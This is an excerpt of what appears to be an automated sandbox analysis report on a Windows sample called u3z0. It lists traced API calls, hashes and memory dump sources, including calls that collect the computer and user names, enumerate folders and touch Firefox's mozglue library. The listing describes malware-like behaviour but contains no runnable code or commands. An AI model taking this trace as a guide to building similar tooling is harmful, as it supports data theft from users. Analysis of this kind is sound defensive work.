                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                        • Opcode ID: a813d0be407c7e97fb4ae0c443796924326960eff0d044c67b11f739482c465e
                                                                                                                                                                                                                                                                                        • Instruction ID: 5341a9e810d76a35e886a0404415562c2a616bd51e9685e0b668c9c894d7d0dc
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a813d0be407c7e97fb4ae0c443796924326960eff0d044c67b11f739482c465e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8341DE34A00209EFCB54CF58C494BADBBB1FF44314F1482A9E95AAB395C735AA91CB84
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 00412ABA
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,044065B0), ref: 00412AD8
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: FindFirstFileA.KERNELBASE(?,?), ref: 004125A0
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2699682494-0
                                                                                                                                                                                                                                                                                        • Opcode ID: ea1ffac3ae604c61d94c3ab08edcb0d871ee1865e913378f7efedfa2106ffca1
                                                                                                                                                                                                                                                                                        • Instruction ID: bcc253f25bf78e1a0e90404f031f6467c50b05fa57c941630bc3dd144581bb5c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ea1ffac3ae604c61d94c3ab08edcb0d871ee1865e913378f7efedfa2106ffca1
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8701B97A900608B7CB24FBB0DC47EDA773D9B54705F404189B64956091EE78AAC4CBE5
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040110E,?,?,004136DC), ref: 00401073
                                                                                                                                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040110E,?,?,004136DC), ref: 004010B7
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2087232378-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
                                                                                                                                                                                                                                                                                        • Instruction ID: a2913bed729a6fe358320823385779fc3d8f71f1cc7b0a13f7ab4b92dd49de4a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 42F027B1641208BBE724DAF4AC59FAFF79CA745B05F304559F980E3390DA719F00CAA4
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                        • Opcode ID: d0ebe2fb72674ebe02027a203c9a5e23a0550e75489eb08aacc5631cf77d8e9a
                                                                                                                                                                                                                                                                                        • Instruction ID: 7a99a0210fb0b6ed6de77f6d22eec219e0a4aedfc9bcf57955c7481c69c901e8
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d0ebe2fb72674ebe02027a203c9a5e23a0550e75489eb08aacc5631cf77d8e9a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9BF01C70C00608EBCB10EF94C9457DDBB74AF44315F10829AD82957380DB395A85CB89
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FolderPathlstrcpy
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1699248803-0
                                                                                                                                                                                                                                                                                        • Opcode ID: c4deb19243b673a040dfd5fdc436edaecc4a41164842cb033ff61c0adf53a60f
                                                                                                                                                                                                                                                                                        • Instruction ID: a2db4f6e5da6e8fb8430e81bb17b8e7aa1674d593408b434fe95881a23a64460
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c4deb19243b673a040dfd5fdc436edaecc4a41164842cb033ff61c0adf53a60f
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A8E01231A4034CABDB61DB90DC96FDD776C9B44B05F004295BA0C5A1C0DA70AB858BD1
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
                                                                                                                                                                                                                                                                                          • Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,044037A0,004136EB,0041D6E3), ref: 004143CD
                                                                                                                                                                                                                                                                                          • Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
                                                                                                                                                                                                                                                                                          • Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC
                                                                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00401186
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Heap$Process$AllocName$ComputerExitUser
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1004333139-0
                                                                                                                                                                                                                                                                                        • Opcode ID: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
                                                                                                                                                                                                                                                                                        • Instruction ID: 69e00d56220517d966a61d162f3bbf9e0969f4784ba4f73569e39f9695f87914
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 78E012B5E1070462CA1573B27E06BD7729D5F9930EF40142AFE0497253FD2DE45145BD
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AllocLocal
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3494564517-0
                                                                                                                                                                                                                                                                                        • Opcode ID: d5c28e0c1c7e45756f81669eafe0f10d1f2d27191eaad386d3d0ade1da73dce0
                                                                                                                                                                                                                                                                                        • Instruction ID: 5f6283e4cb308baa7d4615cf810ff09d37e65c2d0c188b0d2e4390bfcb6d80e5
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d5c28e0c1c7e45756f81669eafe0f10d1f2d27191eaad386d3d0ade1da73dce0
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4701E834904508FFCF04CF98C585BEC7BB2AF44308F648089D9056B395D3789A84DB49
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: malloc
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2803490479-0
                                                                                                                                                                                                                                                                                        • Opcode ID: e14bb29f5c634f52acde74c2c6c6ee0589a433b3a794b1f7692ac0cd2af21e16
                                                                                                                                                                                                                                                                                        • Instruction ID: 71a24ea012b18c325b39d17d5ea825459b0100de2daa219f1012b17ed67d7128
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e14bb29f5c634f52acde74c2c6c6ee0589a433b3a794b1f7692ac0cd2af21e16
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1CC012B090410CEB8B00CF98EC0588A7BECDB08200B0041A4FC0DC3300D631AE1087D5
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C756CCC
                                                                                                                                                                                                                                                                                        • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C756D11
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(0000000C), ref: 6C756D26
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C75CA10: malloc.MOZGLUE(?), ref: 6C75CA26
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C756D35
                                                                                                                                                                                                                                                                                        • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C756D53
                                                                                                                                                                                                                                                                                        • CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C756D73
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C756D80
                                                                                                                                                                                                                                                                                        • CertGetNameStringW.CRYPT32 ref: 6C756DC0
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000000), ref: 6C756DDC
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C756DEB
                                                                                                                                                                                                                                                                                        • CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C756DFF
                                                                                                                                                                                                                                                                                        • CertFreeCertificateContext.CRYPT32(00000000), ref: 6C756E10
                                                                                                                                                                                                                                                                                        • CryptMsgClose.CRYPT32(00000000), ref: 6C756E27
                                                                                                                                                                                                                                                                                        • CertCloseStore.CRYPT32(00000000,00000000), ref: 6C756E34
                                                                                                                                                                                                                                                                                        • CreateFileW.KERNEL32 ref: 6C756EF9
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000000), ref: 6C756F7D
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C756F8C
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C75709D
                                                                                                                                                                                                                                                                                        • CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C757103
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C757153
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 6C757176
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C757209
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C75723A
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C75726B
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C75729C
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C7572DC
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C75730D
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,00000110), ref: 6C7573C2
                                                                                                                                                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C7573F3
                                                                                                                                                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C7573FF
                                                                                                                                                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C757406
                                                                                                                                                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C75740D
                                                                                                                                                                                                                                                                                        • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C75741A
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(?), ref: 6C75755A
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C757568
                                                                                                                                                                                                                                                                                        • CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C757585
                                                                                                                                                                                                                                                                                        • _wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C757598
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C7575AC
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C77AB89: EnterCriticalSection.KERNEL32(6C7CE370,?,?,?,6C7434DE,6C7CF6CC,?,?,?,?,?,?,?,6C743284), ref: 6C77AB94
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C77AB89: LeaveCriticalSection.KERNEL32(6C7CE370,?,6C7434DE,6C7CF6CC,?,?,?,?,?,?,?,6C743284,?,?,6C7656F6), ref: 6C77ABD1
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
                                                                                                                                                                                                                                                                                        • String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
                                                                                                                                                                                                                                                                                        • API String ID: 3256780453-3980470659
                                                                                                                                                                                                                                                                                        • Opcode ID: 3b03f03268a15a4c0df50450a1858a2bbb7188d4a31b5343c0bd532602630220
                                                                                                                                                                                                                                                                                        • Instruction ID: c9efdc1c59cf4c0a1ce5443dd95a3d2277f7737d8de05fbe047fae495d65d0ee
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3b03f03268a15a4c0df50450a1858a2bbb7188d4a31b5343c0bd532602630220
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4E52D771A002159FEB21DF25CE88BAA77BCFB45714F5081A9E909A7640DF30AF94CF91
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C7564DF
                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C7564F2
                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C756505
                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C756518
                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C75652B
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C75671C
                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 6C756724
                                                                                                                                                                                                                                                                                        • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C75672F
                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 6C756759
                                                                                                                                                                                                                                                                                        • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C756764
                                                                                                                                                                                                                                                                                        • VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C756A80
                                                                                                                                                                                                                                                                                        • GetSystemInfo.KERNEL32(?), ref: 6C756ABE
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C756AD3
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C756AE8
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C756AF7
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
                                                                                                                                                                                                                                                                                        • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
                                                                                                                                                                                                                                                                                        • API String ID: 487479824-2878602165
                                                                                                                                                                                                                                                                                        • Opcode ID: 458713b11616144a2bf6325f2f785a592cb36cff7f86f1f63096b75e0b9b0fbe
                                                                                                                                                                                                                                                                                        • Instruction ID: 4096ec05f7490cea25d8069db6c54915ee07951c2439fd57d3a115c1c4d5b614
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 458713b11616144a2bf6325f2f785a592cb36cff7f86f1f63096b75e0b9b0fbe
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DAF1F3709052199FDB20CF25CE88B9AB7B4AF45318F5442E9E809A7741EB31AF94CF91
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C7CE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C77D1C5), ref: 6C76D4F2
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C7CE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C77D1C5), ref: 6C76D50B
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C74CFE0: EnterCriticalSection.KERNEL32(6C7CE784), ref: 6C74CFF6
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C74CFE0: LeaveCriticalSection.KERNEL32(6C7CE784), ref: 6C74D026
                                                                                                                                                                                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C77D1C5), ref: 6C76D52E
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C7CE7DC), ref: 6C76D690
                                                                                                                                                                                                                                                                                        • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C76D6A6
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C7CE7DC), ref: 6C76D712
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C7CE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C77D1C5), ref: 6C76D751
                                                                                                                                                                                                                                                                                        • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C76D7EA
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
